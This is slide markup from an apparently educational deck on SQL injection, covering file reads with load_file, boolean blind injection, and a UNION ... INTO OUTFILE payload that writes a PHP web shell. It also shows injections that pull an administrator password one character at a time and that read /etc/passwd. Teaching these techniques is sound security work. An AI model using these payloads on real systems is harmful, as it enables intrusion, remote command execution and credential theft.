              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Reading and Writing with SQL Functions</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Arbitrary selects can also use the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> load_file(/path/to/file)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> function to read sensitive data (such as /etc/passwd)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO OUTFILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> command allows writing to a file on the system</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>We can use this to upload a shell (assuming the database user has write permissions)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ UNION SELECT 1,’&lt;?php system($_GET[“cmd”]); ?&gt;‘ INTO OUTFILE ‘/path/to/webapp/cmd.php’ --</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="399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000"/>
              <a:t>Blind Injection is a technique for when you cannot see the output of your query directly</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>UNION attacks, for example, output your data onto the page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>But what if the server either responds with “OK” or an error if you do something wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>We can use Blind Injection to craft a query that gives us a certain response based on our input, and use this to extract data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>from the database</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Note: if you use sqlmap, you can perform Boolean Blind Injection attacks using the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> --technique=B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> flag</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Example Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Say we had a page that looked up a user in the database (SELECT username FROM users WHERE username = ‘Mac’) and displays “User Exists!” if </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1000"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> data comes back</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>If we pick a valid username, we can then ask the database some yes or no questions: if we inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND ‘1’=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>we get “User Exists!”, and injecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND ‘1’=‘2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> we get a negative result “No User”</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>So let’s change our injection and ask it about something sensitive - for example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND (SELECT password FROM users WHERE username = 'Administrator') = ‘password</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>If we guessed the admin password correctly, we get back “User Exists!” - but this isn’t very likely, of course</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Instead, we can use SUBSTRING to guess it one character at a time: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 's</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>We could then write a Python script to build a password character by character (I would, but I ran out of time...)</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t>Ippsec has a good example in his </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1000"/>
              <a:t>Intense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000"/>
              <a:t> video: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=nBg6zUalb7c</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p20"/>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Blind SQL Injection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